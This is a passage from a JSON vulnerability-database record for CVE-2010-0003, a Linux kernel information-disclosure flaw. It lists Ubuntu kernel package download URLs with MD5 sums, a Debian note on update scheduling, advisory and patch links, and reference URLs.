adc5365726ba88565ad89953707bd012\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5: 25829918 fc82da730c6d730c5a4ac87d30594749\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb\n      Size/MD5: 24656226 7791f88107e97c5419f0e2d2f850c38e\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_powerpc.deb\n      Size/MD5:   728146 1dabe36864839475aab9293825cfc3e4\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   271924 8fb200d91f158f9b0eb209df5a5ffcd4\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   294610 317f7d34e3cd0ac823fcc5d48bcc9a7f\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   210546 041508a9555e18e2b8b4cab41b26f397\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   216984 845e2e452ef869aa3b39ea47bfa0280b\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    25798 19a7cae7e4f693c269f54dc0f2762f33\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    28984 419926b33e2b573f8d3ccaa5ade657f1\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   314922 83dcb63807ffb50682219b20333c23bc\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   357524 a32753bfca44b1afb9b11f72b25ebb9e\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  2027754 9b45ff8446ec0bad5befec2dc3ecdb72\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  2247744 35d212f7569bb03564a7f0294879557f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   213544 3fb9afb7247290ffb3508744ab6cbb9f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   209776 e42b20eb402cb2a55fea2a80f5cef162\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   210242 78939115c860efacb83481c0687f1a7a\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   244856 8fcff5fb05c0921681ec2bb44637c624\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   111834 a6b65e618a3240d51f36f37911d1d7cc\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   131610 dc5625deacbac446e71517f5902376b1\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    49028 ac60e4bf193e7725de6d8999c6231915\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    44082 531b2cbe15ec2f62fe61bd7002b1df02\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     5852 f049a9332d469b247e451868b4f22cce\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     6504 32fb4de3cd714598281c2d4d5d2ee6d6\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    79118 e98cffbfe6f6cbffcfa6dce199dc6c46\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    85190 e648dc2d3e124d68c47d4ec18836097f\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    74318 19b737ad1f43e7be1c6cc7e211085424\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    27228 0b5b4529d140289e616bded832055cbc\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     8538 9010c080bd63660bf529930565d49f62\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     9818 e909c37d26354ddbdceddc72628d71b3\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    58830 ae6573a0664b5486360156dd6711776c\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    70140 83085dfd5f4bb24ab67dd967e6b609cc\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    23714 86a598e1b13e4d6963475732e7a1097a\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    30804 b382bc0bfffd61156d0f8b3dc90bd307\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  1556894 ea2800c85a0115ad2e524a8b4ab4cb91\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  1509110 e42499f8bdbad020301a11617f6b65a8\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    81698 095ff78875bae0b90edd07ac3b51993d\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    88530 1a36ce88a0c6f7b495c869da15bf9d69\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    64400 8ff9a2aef998409440c1139f3db8c7ee\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    76990 392faa17f8c688e3856d91fb657eba09\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   141540 636e6d1827591a3aa46b82d7dc0b8ab6\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   151356 0f39f4d13770ceab049be6fb9c83fc16\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   139430 14f825a3334b18614059312527002767\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    70106 6dde178febff58a546142209374e1616\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    46510 64b0be995ce3d697a84cd3b0665ffe68\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    93974 28048300aba15f2a3937723bc0afc5cd\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   588788 c17e7feb3442296b7ed93c92cb988625\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   148426 6f429deb9df760daf28c04ad93ea6758\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    75862 6f382de52d9e1b52611c70a703895e5d\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:  2892370 ec9440bb8ee05a7ac071992c5711139f\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb\n      Size/MD5:   601506 1b56c59b3df953a640760b876d752465\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb\n      Size/MD5:   600680 166e5056f971d5fa031230c1af67d028\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb\n      Size/MD5: 20496992 6ebab55c96d6be71ffb8c3a493d31a74\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb\n      Size/MD5: 20193918 98b3c6e44f8e302cca36530b434e9525\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_sparc.deb\n      Size/MD5:   740254 b1a453339b4d68717a445f07b87b53a4\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   266068 1b8caecb838a9dd9b9c765f6603197a3\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   209168 e0e78f6a435e0ca46d5680e08d6e8db0\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    26268 f730be03c2b96e53e779a5d3df4cde93\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   314080 b673ee07d0c907d6ba00a561b915868d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:  1675490 8642bd711b6643bd26ddc80674cef9e4\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   222882 136f6b9e24a16823f7309438fd0bd60a\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   121954 75090ea655204cc898db4634fc8aa021\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    38798 a11bcf765626194255c1d5a7d0106c2a\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   100798 af5903bc65fd381528f733fb1ba4100f\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:     8932 ebcb23a73a538276e41fcff9b7bb1d15\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    62926 7eba529ee44c2e107b693605dcbf1247\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   120960 8f63ad112de0797974650631dee53d13\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:  1217912 87a2a4f21ee86e0f36bc5298a226513b\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   101576 057a15ca3fa891e47216adcf5ae071f7\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   200148 f90834ae24c0f516ef83fa5aa66bafbb\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   184674 d704744a26941df63b9195288306fa7b\n\n. \n\nNote: Debian carefully tracks all known security issues across every\nlinux kernel package in all releases under active security support. \nHowever, given the high frequency at which low-severity security\nissues are discovered in the kernel and the resource requirements of\ndoing an update, updates for lower priority issues will normally not\nbe released for all kernels at the same time. Rather, they will be\nreleased in a staggered or \"leap-frog\" fashion",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0003"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001197"
      },
      {
        "db": "BID",
        "id": "37724"
      },
      {
        "db": "VULHUB",
        "id": "VHN-42608"
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-0003"
      },
      {
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      }
    ],
    "trust": 2.43
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2010-0003",
        "trust": 3.3
      },
      {
        "db": "BID",
        "id": "37724",
        "trust": 2.9
      },
      {
        "db": "SECUNIA",
        "id": "39033",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "38492",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "43315",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "38779",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "38333",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2010/01/13/4",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2010/01/12/1",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001197",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-262",
        "trust": 0.7
      },
      {
        "db": "VULHUB",
        "id": "VHN-42608",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-0003",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "98419",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "86790",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "85958",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "86286",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42608"
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-0003"
      },
      {
        "db": "BID",
        "id": "37724"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001197"
      },
      {
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "db": "PACKETSTORM",
        "id": "86790"
      },
      {
        "db": "PACKETSTORM",
        "id": "85958"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-262"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0003"
      }
    ]
  },
  "id": "VAR-201001-0692",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42608"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T20:55:47.319000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "kernel-2.6.18-128.15.AXS3",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=1023"
      },
      {
        "title": "ChangeLog-2.6.32.4",
        "trust": 0.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.32.4"
      },
      {
        "title": "2054",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=2054"
      },
      {
        "title": "RHSA-2010:0146",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0146.html"
      },
      {
        "title": "RHSA-2010:0147",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0147.html"
      },
      {
        "title": "VMSA-2011-0003",
        "trust": 0.8,
        "url": "http://www.vmware.com/security/advisories/vmsa-2011-0003.html"
      },
      {
        "title": "pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5663"
      },
      {
        "title": "kernel-image-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5667"
      },
      {
        "title": "nfs-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5671"
      },
      {
        "title": "nic-usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5675"
      },
      {
        "title": "linux-headers-2.6.31-19-powerpc_2.6.31-19.56_powerpc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5679"
      },
      {
        "title": "storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5684"
      },
      {
        "title": "block-modules-2.6.31-19-generic-di_2.6.31-19.56_i386",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5688"
      },
      {
        "title": "kernel-debug-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4897"
      },
      {
        "title": "linux-image-2.6.31-304-ec2_2.6.31-304.10_i386",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5692"
      },
      {
        "title": "kernel-default-base-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4901"
      },
      {
        "title": "usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5696"
      },
      {
        "title": "kernel-pae-extra-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4905"
      },
      {
        "title": "kernel-trace-base-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4909"
      },
      {
        "title": "kernel-xen-base-2.6.27.45-0.1.1.i586.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4913"
      },
      {
        "title": "nic-pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5652"
      },
      {
        "title": "kernel-default-base-2.6.27.45-0.1.1.ppc.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4917"
      },
      {
        "title": "ppp-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5656"
      },
      {
        "title": "kernel-ppc64-base-2.6.27.45-0.1.1.ppc.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4921"
      },
      {
        "title": "block-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=5660"
      },
      {
        "title": "kernel-syms-2.6.27.45-0.1.1.ppc.rpm",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=4925"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100146 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100147 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-source-2.6.15 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-894-1"
      },
      {
        "title": "Debian Security Advisories: DSA-2005-1 linux-2.6.24 -- privilege escalation/denial of service/sensitive memory leak",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=730b40b3a3f2a9a1f3cba6257e5248fb"
      },
      {
        "title": "VMware Security Advisories: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=ea953b0a91a1816979ec1d304d5e3d93"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2010-0003"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001197"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-262"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42608"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001197"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0003"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.7,
        "url": "http://www.securityfocus.com/bid/37724"
      },
      {
        "trust": 2.1,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=554578"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/archive/1/516397/100/0/threaded"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/38333"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/38492"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/38779"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/39033"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/43315"
      },
      {
        "trust": 1.8,
        "url": "http://www.debian.org/security/2010/dsa-1996"
      },
      {
        "trust": 1.8,
        "url": "http://www.debian.org/security/2010/dsa-2005"
      },
      {
        "trust": 1.8,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-january/034250.html"
      },
      {
        "trust": 1.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0146.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0147.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2010-0161.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2010-02/msg00002.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2010-02/msg00005.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00000.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2010/01/12/1"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2010/01/13/4"
      },
      {
        "trust": 1.8,
        "url": "http://patchwork.kernel.org/patch/69752/"
      },
      {
        "trust": 1.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.32.4"
      },
      {
        "trust": 1.8,
        "url": "http://www.vmware.com/security/advisories/vmsa-2011-0003.html"
      },
      {
        "trust": 1.8,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10550"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=b45c6e76bc2c72f6426c14bed64fdcbc9bf37cb0"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0003"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-0003"
      },
      {
        "trust": 0.6,
        "url": "http://support.avaya.com/css/p8/documents/100079484"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0003"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0007"
      },
      {
        "trust": 0.3,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=b45c6e76bc2c72f6426c14bed64fdcbc9bf37cb0"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.3,
        "url": "http://support.avaya.com/css/p8/documents/100081688"
      },
      {
        "trust": 0.3,
        "url": "http://www.ubuntu.com/usn/usn-894-1"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4308"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0291"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4536"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4538"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/"
      },
      {
        "trust": 0.2,
        "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4020"
      },
      {
        "trust": 0.2,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.2,
        "url": "http://security.debian.org/"
      },
      {
        "trust": 0.2,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0415"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4138"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0410"
      },
      {
        "trust": 0.2,
        "url": "http://packages.debian.org/\u003cpkg\u003e"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4021"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/200.html"
      },
      {
        "trust": 0.1,
